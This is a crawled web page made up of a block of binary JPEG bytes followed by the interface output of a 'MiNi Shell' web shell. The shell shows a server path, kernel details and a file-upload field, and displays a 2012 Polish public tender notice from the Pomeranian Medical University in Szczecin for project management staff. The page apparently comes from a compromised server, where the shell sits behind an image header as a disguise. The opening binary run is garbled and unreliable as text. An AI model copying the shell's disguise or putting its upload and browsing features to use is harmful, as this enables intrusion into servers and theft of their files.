JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/238515-N-2012.html

<p class="kh_header"><b>Szczecin: Wykonywanie usług kierownika merytorycznego, koordynatora merytorycznego, asystenta kierownika oraz specjalisty ds. finansowych projektu AGNITIO - innowacyjny model monitoringu losów absolwentów realizowany przy współpracy z branżowymi medycznymi instytucjami samorządowymi</b><br>
<b>Numer ogłoszenia: 238515 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorski Uniwersytet Medyczny w Szczecinie , ul. Rybacka 1, 70-204 Szczecin, woj. zachodniopomorskie, tel. 91 4800703, faks 91 4800705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pum.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług kierownika merytorycznego, koordynatora merytorycznego, asystenta kierownika oraz specjalisty ds. finansowych projektu AGNITIO - innowacyjny model monitoringu losów absolwentów realizowany przy współpracy z branżowymi medycznymi instytucjami samorządowymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie usług kierownika merytorycznego, koordynatora merytorycznego, asystenta kierownika oraz specjalisty ds. finansowych projektu AGNITIO - innowacyjny model monitoringu losów absolwentów realizowany przy współpracy z branżowymi medycznymi instytucjami samorządowymi:
Kierownik merytoryczny projektu:
ponoszenie odpowiedzialności za spełnienie wszystkich wymagań formalnych 
i merytorycznych związanych z wykorzystaniem środków przyznanych na realizację projektu, zgodnie z umową o dotację i ogólnymi zasadami finansowania projektów,
pośredniczenie w kontaktach między zespołem projektowym, a Sponsorem,
podejmowanie strategicznych decyzji,
bieżące zarządzanie projektem,
dobranie kompetentnych członków zespołu projektowego i rozdzielenie im poszczególnych zadań do zrealizowania,
zwoływania spotkań roboczych zespołu projektowego - w miarę potrzeb,
określenie zadań do rozwiązania przez zespół projektowy,
rozwiązywanie ewentualnych konfliktów w zespole projektowym
prowadzenie spotkań zespołu projektowego, a także motywowanie podwładnych do efektywnego działania,
razem z zespołem projektowym podejmowanie decyzji związanych z wykorzystaniem środków, analizowanie alternatywnych rozwiązań w trakcie realizacji poszczególnych zadań,
wybór wykonawców poszczególnych zadań merytorycznych w projekcie,
podziału zadań merytorycznych między poszczególne osoby,
nadzór nad weryfikowaniem pod względem merytorycznym realizowanych 
i zrealizowanych prac,
bieżące monitorowanie realizacji projektu na poziomie strategicznym,
w sytuacji braku możliwości dotrzymania harmonogramu - dokonywanie 
w ustalonym trybie uzgodnień z koordynatorem merytorycznym projektu,
dbanie o zapewnienie nieustannej gwarancji, że projekt koncentruje się na osiąganiu zamierzonych celów, 
sprawdzanie zgodności realizacji zadań z harmonogramem,
dbanie o zapewnienie wysokiej, jakości produktu,
zatwierdzanie pod względem merytorycznym dokonywanych wydatków,
nadzór nad przygotowaniem sprawozdań finansowych,
potwierdzanie kart czasu pracy pracowników realizujących projekt,
współpraca z Instytucją Pośredniczącą,
dokumentowanie przebiegu i wyników pracy własnej.
Wymiar czasu wykonywania usługi - przeciętnie 60h/mc. Wymagane jest osobiste wykonywanie usługi na miejscu, w siedzibie Zamawiającego. W przypadku kolizji obowiązków wynikających z umowy zawartej z Zamawiającym oraz innych obowiązków osoby pełniącej wskazaną funkcję, pierwszeństwo mają obowiązki wynikające z umowy zawartej w wyniku niniejszego postępowania. 


Koordynator merytoryczny projektu 
uczestnictwo w spotkaniach zespołu projektowego wg ustalonego harmonogramu
koordynowanie i zarządzanie pracami projektowymi,
koordynacja i  dbałość o współpracę poszczególnych członków zespołu projektowego,
odpowiedzialność za terminowość podejmowanych działań, 
nadzór nad terminowością i prawidłowością realizowanych zadań,
dobór i przedstawianie kierownikowi merytorycznemu osób do realizacji poszczególnych zadań w projekcie,
przygotowywanie propozycji w zakresie zatrudnienia,
dokonywanie podziału zadań merytorycznych między poszczególne osoby,
weryfikowanie pod względem merytorycznym realizowanych i zrealizowanych prac,
planowanie zadań do realizacji zgodnie z opracowanym wstępnym harmonogramem, 
ścisła współpraca i regularna komunikacja oraz nadzór nad pracą wszystkich osób zaangażowanych w realizację projektu,
nadzór nad realizacją poszczególnych zadań w projekcie,
raportowanie o podziale zadań merytorycznych między poszczególne osoby
raportowanie kierownikowi merytorycznemu o zauważonych nieprawidłowościach, 
monitorowanie wskaźników realizacji projektu,
przedkładanie szczegółowych raportów okresowych dla kierownika merytorycznego,
zarządzanie przepływem informacji,
zarządzanie procesem wytwarzania produktu, 
wyznaczanie zadań i egzekwowanie ich wykonania,
uruchamianie, nadzorowanie i zakończenie prac poszczególnych zespołów,
kontrola oraz nadzór nad przestrzeganiem harmonogramu realizacji projektu, 
kontrola czasu pracy zatrudnionego personelu,
nadzorowanie prawidłowego prowadzenia kart czasu pracy przez osoby realizujące projekt,
koordynowanie działań zgodnie z harmonogramem realizacji  projektu, 
sygnalizowanie kierownikowi projektu zagrożeń i ewentualnych odstępstw od harmonogramu,
rozwiązywanie bieżących problemów,
bieżący monitoring osiąganych rezultatów,
zarządzanie ryzykiem: ciągła identyfikacja, ocena ryzyka,
przestrzeganie procedur i instrukcji związanych z realizacją projektu,
nadzór nad procesem ewaluacji projektu,
nadzór nad przestrzeganiem zgodności podejmowanych w ramach projektu działań zgodnie z wytycznymi Unii Europejskiej i instytucjami PO KL dla działania 4.1
nadzorowanie przygotowania wszystkich dokumentów, sprawozdań i raportów wymaganych przez Instytucje Pośredniczącą, 
współpraca z Instytucją Pośredniczącą,
dokumentowanie przebiegu i wyników pracy własnej.
Wymiar czasu wykonywania usługi - przeciętnie 60h/mc. Wymagane jest osobiste wykonywanie usługi na miejscu, w siedzibie Zamawiającego. W przypadku kolizji obowiązków wynikających z umowy zawartej z Zamawiającym oraz innych obowiązków osoby pełniącej wskazaną funkcję, pierwszeństwo mają obowiązki wynikające z umowy zawartej w wyniku niniejszego postępowania. 

Asystent kierownika merytorycznego
 uczestnictwo w spotkaniach zespołu projektowego wg ustalonego harmonogramu,
robocze kontakty z uczestnikami projektu,
prowadzenie biura projektu,
prowadzenie dokumentacji projektu,
logistyczna organizacja spotkań zespołu empowerment,
logistyczna organizacja warsztatów,
logistyczna organizacja konferencji,
logistyczna organizacja przygotowania plakatów,
przygotowanie szczegółowych raportów okresowych dla kierownika merytorycznego,
raportowanie o zauważonych nieprawidłowościach, 
sprawdzanie kart czasu pracy pracowników realizujących projekt,
koordynowanie obiegu dokumentów związanych z realizacja projektu,
archiwizowanie  dokumentacji projektowej,
prowadzenie ewidencji godzin pracy osób zaangażowanych w realizację zadań,
współpraca z koordynatorem projektu w celu zapewnienia prawidłowego przepływu informacji
dokumentowanie przebiegu i wyników pracy własnej.
Wymiar czasu wykonywania usługi - przeciętnie 80h/mc. Wymagane jest osobiste wykonywanie usługi na miejscu, w siedzibie Zamawiającego. W przypadku kolizji obowiązków wynikających z umowy zawartej z Zamawiającym oraz innych obowiązków osoby pełniącej wskazaną funkcję, pierwszeństwo mają obowiązki wynikające z umowy zawartej w wyniku niniejszego postępowania. 

Specjalista ds. finansowych
finansowe rozliczenie projektu,
uczestnictwo w spotkaniach zespołu projektowego wg ustalonego harmonogramu,
składanie wniosków o płatność do Instytucji Pośredniczącej, 
współpraca z Kierownikiem merytorycznym, 
przygotowywanie wszelkich sprawozdań, raportów i analiz księgowo-finansowych na potrzeby Kierownika merytorycznego,
przygotowywanie sprawozdań i innych dokumentów wymaganych przez instytucje zarządzające i kontrolujące,
utrzymywanie kontaktu z Instytucją Pośredniczącą,
monitorowanie  realizacji harmonogramu rzeczowo-finansowego,
nadzór nad płynnością finansową projektu,
opisywanie zaakceptowanych przez Kierownika merytorycznego dokumentów księgowych zgodnie z wytycznymi POKL,
przekazywanie dokumentów księgowych do podpisu upoważnionym osobom, 
kompletowanie i przekazywanie dokumentacji księgowej do Działu Księgowości,
zgodnie z potrzebami kopiowanie dokumentów księgowych, 
potwierdzenia kopii za zgodność z oryginałem,
współpraca z działami PUM współuczestniczącymi przy realizacji projektu                      w zakresie dokumentacji  projektowej, 
kontrolowanie zleceń wypłaty wynagrodzenia pracowników zatrudnionych                      w projekcie, 
comiesięczne składanie dyspozycji płatności składek ZUS i podatku  za pracowników Projektu do Działu Finansowego,
comiesięczne sporządzanie zestawienia przelanych składek za pracowników Projektu dla działu płac, 
archiwizowanie  dokumentacji projektowej związanej z finansowym rozliczeniem projektu,
raportowanie o zauważonych nieprawidłowościach,
umieszczenie informacji o projekcie na stronie internetowej Biura ds. Programów Europejskich PUM,
dokumentowanie przebiegu i wyników pracy własnej.

Wymiar czasu wykonywania usługi - przeciętnie 80h/mc. Wymagane jest osobiste wykonywanie usługi na miejscu, w siedzibie Zamawiającego. W przypadku kolizji obowiązków wynikających z umowy zawartej z Zamawiającym oraz innych obowiązków osoby pełniącej wskazaną funkcję, pierwszeństwo mają obowiązki wynikające z umowy zawartej w wyniku niniejszego postępowania. 
Wymagany termin realizacji niniejszego zamówienia: od podpisania umowy do dnia 30.11.2015, z  zastrzeżeniem, iż:
a)	w przypadku negatywnej oceny strategii wdrażania projektu, umowa ulegnie rozwiązaniu po upływie 8 miesięcy od dnia podpisania, bez prawa Wykonawcy do podnoszenia jakichkolwiek roszczeń z tego tytułu;
b)	W przypadku braku pozytywnej walidacji produktu finalnego przez sieć tematyczną, umowa ulegnie rozwiązaniu po upływie 26 miesięcy od dnia podpisania, bez prawa Wykonawcy do podnoszenia jakichkolwiek roszczeń z tego tytułu;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z uPZP</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.41.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; Wykaz należy sporządzić zgodnie z wzorem stanowiącym załącznik nr 4
Zamawiający wymaga, aby wykonawcy składający ofertę wykazali, że dysponują czterema osobami dedykowanymi do wykonywania zadań wynikających z niniejszej SIWZ, tj:
a)	jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję kierownika merytorycznego projektu, która spełnia łącznie następujące warunki: posiada tytuł doktora nauk medycznych, wykonywała/wykonuje co najmniej 1 usługę polegającą na administrowaniu (koordynowaniu, kierowaniu) projektem dofinansowanym przez Unię Europejską w ramach EFS, posiada min. 5-letnie doświadczenie kierownicze w pracy na medycznej uczelni wyższej, 
b)	jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję koordynatora merytorycznego projektu, która spełnia łącznie następujące warunki:  posiada wykształcenie wyższe magisterskie, studia podyplomowe z zakresu zarządzania, posiada min. 3-letnie doświadczenie kierownicze na medycznej uczelni wyższej. 
c)	jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję asystenta kierownika projektu, która spełnia łącznie następujące warunki: posiada wykształcenie wyższe magisterskie ekonomiczne lub administracyjne, posiada min. 2-letnie doświadczenie w pracy na medycznej uczelni wyższej.
d)	jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję specjalisty ds. finansowych, która spełnia łącznie następujące warunki: posiada wykształcenie wyższe ekonomiczne oraz z zakresu zarządzania projektami UE.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy                 - załącznik nr 1</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający informuje, iż zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na  podstawie  której dokonano wyboru Wykonawcy jest zakazana, za wyjątkiem sytuacji, gdy:
zmiana jest dla Zamawiającego korzystna;
zmiana wynika ze zmiany ustawowej stawki podatku VAT;
zmiana wynika ze zmian Zasad finansowania Programu Operacyjnego Kapitał Ludzki lub Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pum.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorski Uniwersytet Medyczny w Szczecinie
ul. Rybacka 1
70-204 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 11:30, miejsce: Pomorski Uniwersytet Medyczny w Szczecinie
ul. Rybacka 1
70-204 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> AGNITIO - innowacyjny model monitoringu losów absolwentów realizowany przy współpracy z branżowymi medycznymi instytucjami samorządowymi, nr umowy UDA -POKL.04.01.01-00-279/11-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com